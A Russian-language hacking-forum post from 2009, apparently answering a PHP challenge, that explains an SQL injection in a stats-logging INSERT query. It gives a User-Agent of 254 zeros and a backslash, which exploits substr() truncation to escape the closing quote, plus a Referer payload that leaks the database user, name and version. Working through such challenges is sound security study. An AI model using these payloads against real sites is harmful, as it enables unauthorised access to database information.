[PHP] ЗАДАНИЯ от Krist_ALL

#19

11.11.2009, 15:25

mailbrush

Познавший АНТИЧАТ

Регистрация: 24.06.2008

Сообщений: 1,996

С нами: 9410786

Репутация: 2731

Цитата:

Сообщение от (Dm)

если ты эт про мое задание, напиши как выполнить sql инъекцию.

Да очень просто... Я уже один раз встречался с подобным

Юзер-агент ставим:

Код:

00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000\

Реферер:

Код:

, concat_ws(0x3a,user(),database(),version())) --

И таким образом в поле "Реферер" запишется юзер, бд, версия. Почему? Да потому что substr() обрезает строку до 255 символов, а у нас она 256 символов - 254 нуля и слешированый слеш, тоесть \\. Ну а дальше по логике запроса идет:

Код:

INSERT INTO stats (ip, useragent, referer) 
        
VALUES 

(

'127.0.0.1', 

'000...много нулей...00\',',

 concat_ws(0x3a,user(),database(),version())

)

--')

ЗЫ: Вот тут была похожая ситуация:
http://forum.antichat.ru/threadnav134652-1-10.html